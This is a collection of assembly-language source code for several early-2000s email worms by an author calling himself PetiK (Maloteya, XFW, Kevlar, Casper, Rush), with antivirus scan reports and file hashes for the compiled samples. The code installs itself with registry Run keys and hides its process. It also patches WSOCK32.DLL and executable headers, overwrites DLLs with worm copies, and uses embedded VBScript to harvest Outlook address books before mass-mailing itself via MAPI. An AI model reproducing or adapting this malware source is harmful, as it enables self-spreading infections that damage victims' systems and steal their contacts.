push 02h ; PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h ; FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz F3
d_scan_mail:
call @melto
db 'mailto:'
@melto: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail
.data
namer db 50 dup (0)
szCopb db 50 dup (0)
szCopie db 50 dup (0)
szCurrent db 50 dup (0)
szOrig db 50 dup (0)
szSystemini db 50 dup (0)
szWinini db 50 dup (0)
Cache db 70 dup (0)
StartUp db 70 dup (0)
m_addr db 128 dup (?)
WSA_Data db 400 dup (0)
buf_recv db 512 dup (0)
Default db 0
FileHdl dd ?
octets dd ?
netcheck dd ?
sendmail dd ?
getfolder dd ?
htmlHdl dd ?
MAPIhdl dd ?
SHELLhdl dd ?
WNEThdl dd ?
RegHdl dd ?
Dist dd 0
Temp dd 0
MAPIh dd 0
WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h
Origine db "Made In France",00h
Message dd ?
dd offset sujet
dd offset corps
dd ?
dd offset date
dd ?
dd 2 ; MAPI_RECEIPT_REQUESTED ??
dd offset MsgFrom
dd 1 ; MAPI_UNREAD ??
dd offset MsgTo
dd 1
dd offset AttachDesc
MsgFrom dd ?
dd ?
dd offset NameFrom
dd offset MailFrom
dd ?
dd ?
MsgTo dd ?
dd 1 ; MAIL_TO
dd offset NameTo
dd offset m_addr
dd ?
dd ?
AttachDesc dd ?
dd ?
dd ? ; character in text to be replaced by attachment
dd offset szCopb ; Full path name of attachment file
dd ?
dd ?
Send_M: dw fHELO-dHELO
dw fFROM-dFROM
dw fRCPT-dRCPT
dw fDATA-dDATA
dw fMAIL-dMAIL
dw fQUIT-dQUIT
OSVERSIONINFO struct
dwOSVersionInfoSize dd ?
dwMajorVersion dd ?
dwMinorVersion dd ?
dwBuildNumber dd ?
dwPlatformId dd ?
szCSDVersion db 128 dup (?)
OSVERSIONINFO ends
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
end DEBUT
end
File Maloteya.exe received on 05.16.2009 17:52:03 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.12288
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.4
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!8c02
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Maloteya
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.D
BitDefender 7.2 2009.05.16 Win32.Matoleya.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik
ClamAV 0.94.1 2009.05.16 Worm.Petik-1
Comodo 1157 2009.05.08 Worm.Win32.Petik.F
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.12288
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.12288
F-Prot 4.4.4.56 2009.05.16 W32/Malware!8c02
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Sabak.A!worm.im
GData 19 2009.05.16 Win32.Matoleya.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.4
Microsoft 1.4602 2009.05.16 Worm:Win32/Pet_tik.E@mm
NOD32 4080 2009.05.15 Win32/Petik.F
Norman 6.01.05 2009.05.16 W32/Pet_Tick.12288.A
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.F
PCTools 4.4.2.0 2009.05.16 VBS.Petik.F
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.q
Sophos 4.41.0 2009.05.16 W32/Petik-E
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.G
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.12288
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.12288
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.F
Additional information
File size: 12288 bytes
MD5...: eb7bea183626119bc54c4ab1de80c606
SHA1..: 1f022ad7156e8d510168b7ba441afeb966edb828
comment #
Name : I-Worm.XFW (Extra French Worm)
Author : PetiK
Date : July 10th - August 3th
Size : 5632 byte (compressed with UPX)
Action: It copies itself to \SYSTEM\Services.exe. It adds a value in the run services key
:
"Run Services"="\SYSTEM\Services.exe". It alters the "run=" lines int he WIN.INI
file.
It copies the file WSOCK32.DLL by WSOCK32.PTK and alters the original file while
add
"PetiK" in the file.It displays a message and create a \WINDOWS\Tool_PetiK.txt.
This file explains how repair WSOCK32.DLL.
If the worm is located in the \SYSTEM folder, it searches all DLL files in the
current folder (SYSTEM here) and copies them by the worm while add the ".EXE"
extention.
FILE.DLL ==>> FILE.DLL.EXE
It creates at the end if the computer is connected a VBS file to spread with
Outlook.
To delete : del \WINDOWS\SYSTEM\Wsock32.dll
ren \WINDOWS\SYSTEM\Wsock32.ptk \WINDOWS\SYSTEM\Wsock32.dll
del \WINDOWS\SYSTEM\Services.exe
del \WINDOWS\SYSTEM\*.dll.exe
del \WINDOWS\Tool_PetiK.txt
del in the WIN.INI file after run=
del C:\.vbs
.586p
.model flat
.code
;JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
push 01h
push offset n_wsck
push offset a_wsck
callx CopyFileA
test eax,eax
jz FIN
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset a_wsck
callx CreateFileA
inc eax
jz FIN
dec eax
mov WsckHdl,eax
xor eax,eax
push eax
push eax
push eax
push 04h ; PAGE_READWRITE
push eax
push WsckHdl
callx CreateFileMappingA
test eax,eax
jz FIN2
mov WsckMap,eax
xor eax,eax
push eax
push eax
push eax
push 06h ; SECTION_MAP_WRITE or READ
push WsckMap
callx MapViewOfFile
test eax,eax
jz FIN3
mov WsckView,eax
mov esi,eax
cmp byte ptr [esi+12h],"P"
je FIN3
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"
INF_DLL:
D_INF: push 50
push offset szCurFolder
callx GetCurrentDirectoryA
push offset szCurFolder
callx SetCurrentDirectoryA
FFF: push offset Search
@pushsz "*.dll"
callx FindFirstFileA ; search all DLL files
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
i_file: pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"EXE." ; and add .EXE => file.dll.exe
stosd
xor eax,eax
stosd
push 01h
push offset Search.cFileName
push offset szOrig
callx CopyFileA ; and copies with the main worm
test eax,eax
jz S_P
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
FC: push [htmlHdl]
callx FindClose
popad
F_INF:
@pushsz "http://www.whitesonly.net"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.kkk.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.front-national.fr"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.lepen-tv.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.hammerskins.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
jmp INET
FORMAT: pushad
push 00h
push 20h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\Autoexec.bat"
callx CreateFileA
mov edi,eax
push 00h
push offset octets
push BATSIZE
push offset batd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
jmp FIN
push 40h
@pushsz "Internet"
@pushsz "You're connected"
push 00h
callx MessageBoxA
VBS: pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\Win.vbs"
callx CreateFileA
mov edi,eax
push 00h
push offset octets2
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 01h
@pushsz "wscript C:\Win.vbs"
callx WinExec
push 30 * 1000
@pushsz "C:\Win.vbs"
callx DeleteFileA
.data
; ========== INSTALLATION ==========
a_wsck db 50 dup (0)
n_wsck db 50 dup (0)
szCopie db 50 dup (0)
szOrig db 50 dup (0)
Winini db 50 dup (0)
windir db 50 dup (0)
octets dd ?
; ============ INFECTION 1 ===========
WsckHdl dd ?
filesize dd ?
WsckMap dd ?
WsckView dd ?
; ============ INFECTION 2 ===========
htmlHdl dd ?
szCurFolder db 50 dup (0)
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
end DEBUT
end
File XFW.exe received on 05.16.2009 20:03:58 (CET)
Additional information
File size: 5632 bytes
MD5...: ca27691bf2137dc610588dd9f09de3b2
SHA1..: 5b1aac1f8783d4123f3b88c213bc8321dc8d6a4a
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Kevlar
Author : PetiK
Date : August 7th - August 16th
Language : ASM
Size : 5120 byte
Action : Copy itself to %System%\Kevlar32.exe hidden attribute
%System%\MScfg32.exe normal attribute
Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System
%\Kevlar32.exe
Attachment : MScfg32.exe
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
F_NAME: push 50
mov esi,offset Orig
push esi
push 0
callx GetModuleFileNameA
push esi
callx GetFileAttributesA
cmp eax,1
je SUITE
push 0
push edi
push esi
callx CopyFileA
push 01h
push edi
callx SetFileAttributesA
REG: pushad
@pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov edi,eax
@pushsz "SHSetValueA"
push edi
callx GetProcAddress
test eax,eax
jz FIN
mov esi,eax
push 08h
push offset CopyName
push 01h
@pushsz "Kevlar32"
@pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
call esi
push edi
callx FreeLibrary
popad
call Nick
mov edi,offset nickname
push 40h
@pushsz "Hello, my name is :"
push edi
push 0
callx MessageBoxA
call Infect
jmp FIN
Nick Proc
mov edi,offset nickname
callx GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
name_g:
push ecx
callx GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
callx GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
callx Sleep
pop ecx
loop name_g
ret
Nick EndP
Infect Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF:
push offset Search
@pushsz "C???????.exe"
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [exeHdl],eax
I_FILE:
mov verif,0
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset Search.cFileName
callx CreateFileA
inc eax
jz FNF
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
jz CL1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 06h
push ebp
callx MapViewOfFile
test eax,eax
jz CL2
xchg eax,edi
mov esi,eax
cmp word ptr [esi],"ZM"
jne CL2
cmp byte ptr [esi+18h],"@"
jne CL2
cmp word ptr [esi+80h],"EP"
jne CL2
cmp byte ptr [esi+12h],"P"
je CL2
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"
inc verif
push edi
callx UnmapViewOfFile
CL2:
push ebp
callx CloseHandle
CL1:
push ebx
callx CloseHandle
cmp verif,1
jne FNF
mov edi,offset InfoFile
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'iSM\'
stosd
mov eax,'3ofn'
stosd
mov eax,'xt.2'
stosd
mov al,'t'
stosb
pop edi
mov esi,edi
push esi
@pushsz "Infected by W32.Kevlar.PetiK"
push offset Search.cFileName
@pushsz "File Infected"
callx WritePrivateProfileStringA
FNF:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE
FC:
push [exeHdl]
callx FindClose
F_INF:
popad
ret
Infect EndP
Infect2 Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF2:
push offset Search
@pushsz "*.exe"
callx FindFirstFileA
inc eax
je F_INF2
dec eax
mov [exeHdl],eax
I_FILE2:
pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset Search.cFileName
callx CreateFileA
test eax,eax
xchg ebp,eax
push 00h
push offset octets
push HTMSIZE
push offset htmd
push ebp
callx WriteFile
push ebp
callx CloseHandle
popad
FNF2:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE2
FC2:
push [exeHdl]
callx FindClose
F_INF2:
popad
ret
Infect2 EndP
OPEN: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset addbook
callx CreateFileA
inc eax
je NO
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3 ; is the file empty ??
call SCAN
SCAN:
pushad
xor edx,edx
mov edi,offset m_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"!"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je SCAN
call SEND_MAIL
jmp SCAN
entr2: xor al,al
stosb
pop edi
jmp SCAN
f_mail: popad
ret
SEND_MAIL:
push 50
push offset save_addr
callx GetWindowsDirectoryA
@pushsz "\MSinfo32.txt"
push offset save_addr
callx lstrcat
push offset save_addr
@pushsz "Next victim"
push offset m_addr
@pushsz "EMail saved"
callx WritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; ===== INSTALLATION =====
Orig db 50 dup (0)
CopyName db 50 dup (0)
CopyName2 db 50 dup (0)
nickname db 11 dup (?)
; ===== INFECTION =====
InfoFile db 50 dup (0)
WinPath db 50 dup (0)
exeHdl dd ?
verif dd ?
octets dd ?
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd NameFrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset CopyName2
dd ?
dd ?
htmd:
db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
db '<script language=vbscript>',0dh,0ah
db 'on error resume next',0dh,0ah
db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
db 'If err.number=429 then',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
db 'You need ActiveX enabled to see this file<br><a
href=''javascript:location.reload()''>'
db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
db 'Else',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'document.write "<font face=''verdana'' size=''3'' color=red>'
db 'This page is generate by a worm<br>But this worm is proteced by
Kevlar<br></font>"',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
db 'Worms are not dangerous for your computer but to survive, they must be
strong</font>"',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.avp.ch"',0dh,0ah
db 'End If',0dh,0ah
db '</script></html>',00h
HTMSIZE = $-htmd
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine "!"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd
end DEBUT
end
File Kevlar.exe received on 05.16.2009 17:43:00 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.5120
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Kev
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!c6f1
Avast 4.8.1335.0 2009.05.15 Win32:Kevlar
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.H
BitDefender 7.2 2009.05.16 Generic.Malware.GSMsp!.411C2399
CAT-QuickHeal 10.00 2009.05.15 W32.Petik
ClamAV 0.94.1 2009.05.16 Win32.Pet_Tick.M
Comodo 1157 2009.05.08 Worm.Win32.Petik.L
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Kevlar
F-Prot 4.4.4.56 2009.05.16 W32/Malware!c6f1
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 JS/KEVLAR.A
GData 19 2009.05.16 Generic.Malware.GSMsp!.411C2399
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!95EC22B0B688
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Kev
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.M@mm
NOD32 4080 2009.05.15 Win32/Petik.L
Norman 6.01.05 2009.05.16 W32/Pet_Tick.5120
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.C
PCTools 4.4.2.0 2009.05.16 I-Worm.Petik.I1
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Trojan.Petik
Sophos 4.41.0 2009.05.16 W32/Kevlar
Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik
Symantec 1.4.4.12 2009.05.16 W32.Pet_Tick.M
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.M
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Petik.5120
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petik.I1
Additional information
File size: 5120 bytes
MD5...: 95ec22b0b68815a9bf6def95e5c3b9b1
SHA1..: 00dbadea4b400e6e0ae58951d063a4943fd1fc8d
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Casper
Author : PetiK
Date : August 17th - August 24th
Size : 6144 byte (compressed with UPX tool)
dllz.def file:
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
Main_Worm:
call Hide_Worm
call Copy_Worm
call Check_Wsock
call Prepare_Spread_Worm
Connected_:
push 00h
push offset Tmp
callx InternetGetConnectedState
dec eax
jnz Connected_
mov edi,offset casper_mail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"saC\"
stosd
mov eax,"Erep"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call Spread_Worm
Hide_Worm proc
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz End_Hide
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz End_Hide
push 1
push 0
call ecx
End_Hide:
popad
ret
Hide_Worm endp
Check_Wsock proc
Search_Wsock:
push 50
mov edi,offset wsock_file
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"osW\"
stosd
mov eax,"23kc"
stosd
mov eax,"lld."
stosd
xor eax,eax
stosd
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset wsock_file
callx CreateFileA
mov wsckhdl,eax
File_Mapping:
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push wsckhdl
callx CreateFileMappingA
test eax,eax
jz Close_File
mov wsckmap,eax
xor eax,eax
push eax
push eax
push eax
push 06h
push wsckmap
callx MapViewOfFile
test eax,eax
jz Close_Map_File
mov esi,eax
mov wsckview,eax
Old_Infect:
mov verif,0
cmp word ptr [esi],"ZM"
jne UnmapView_File
cmp byte ptr [esi+12h],"z"
je Infected_By_Happy
cmp word ptr [esi+38h],"ll"
je Infected_By_Icecubes
jmp UnmapView_File
Infected_By_Happy:
push 10h
push offset warning
@pushsz "I-Worm.Happy coded by Spanska"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Infected_By_Icecubes:
push 10h
push offset warning
@pushsz "I-Worm.Icecubes coded by f0re"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Already_Infected:
inc verif
jmp UnmapViewOfFile
UnmapView_File:
push wsckview
callx UnmapViewOfFile
Close_Map_File:
push offset wsckmap
callx CloseHandle
Close_File:
push wsckhdl
callx CloseHandle
End_Wsock:
ret
Check_Wsock endp
Copy_Worm proc
pushad
Original_Name:
push 50
mov esi,offset original
push esi
push 0
callx GetModuleFileNameA
Copy_Name:
mov edi,offset copy_name
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'WsM\'
stosd
mov eax,'osni'
stosd
mov eax,'23kc'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
Reg_Registered:
push 08h
push edi
push 01h
@pushsz "Winsock32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
push 08h
@pushsz "PetiK - France - (c)2001"
push 01h
@pushsz "Author"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
push 08h
@pushsz "1.00"
push 01h
@pushsz "Version"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
popad
ret
Copy_Worm endp
Prepare_Spread_Worm proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\CasperMail.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
push 1
@pushsz "wscript C:\CasperMail.vbs"
callx WinExec
push 3 * 1000
callx Sleep
@pushsz "C:\CasperMail.vbs"
callx DeleteFileA
popad
ret
Prepare_Spread_Worm endp
Spread_Worm:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset casper_mail
callx CreateFileA
inc eax
test eax,eax
je End_Spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3
call Scan_Mail
.data
; ===== Main_Worm =====
wsock_file db 50 dup (0)
; ===== Check_Wsock =====
wsckhdl dd 0
wsckmap dd 0
wsckview dd 0
PEHeader dd 0
warning db "Warning : You're infected by",00h
verif dd ?
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset original
dd offset mail_name
dd ?
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah
db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine "#"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
end DEBUT
end
File Casper.exe received on 05.16.2009 11:21:10 (CET)
Additional information
File size: 6144 bytes
MD5...: 87e2b361908ac17e03ae947c75a140a2
SHA1..: f038e389ea778594125222e97d82a0a2c1404986
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Rush
Author : PetiK
Date : August 27th - September 2nd
Size : 5632 byte (compiled with UPX tool)
Attached : ScanVir_25.exe
* Scans title of windows :
- Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
- System Properties => Minimize the window
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
;call hide_worm
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
callx GetModuleFileNameA
push 0
push edi
push esi
callx CopyFileA
push 8
push edi
push 1
@pushsz "Mail Outlook"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
check_date:
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne beep1
cdrom_open:
push 00h
push 00h
push 00h
@pushsz "open cdaudio"
callx mciSendStringA
push 00h
push 00h
push 00h
@pushsz "set cdaudio door open"
callx mciSendStringA
special_folder:
push 00h
push 05h
push offset personal
push 00h
callx SHGetSpecialFolderPathA
@pushsz "\Read_Me.txt"
push offset personal
callx lstrcat
txt_file:
push 00h
push 01h
push 02h
push 00h
push 01h
push 40000000h
push offset personal
callx CreateFileA
mov [FileHdl],eax
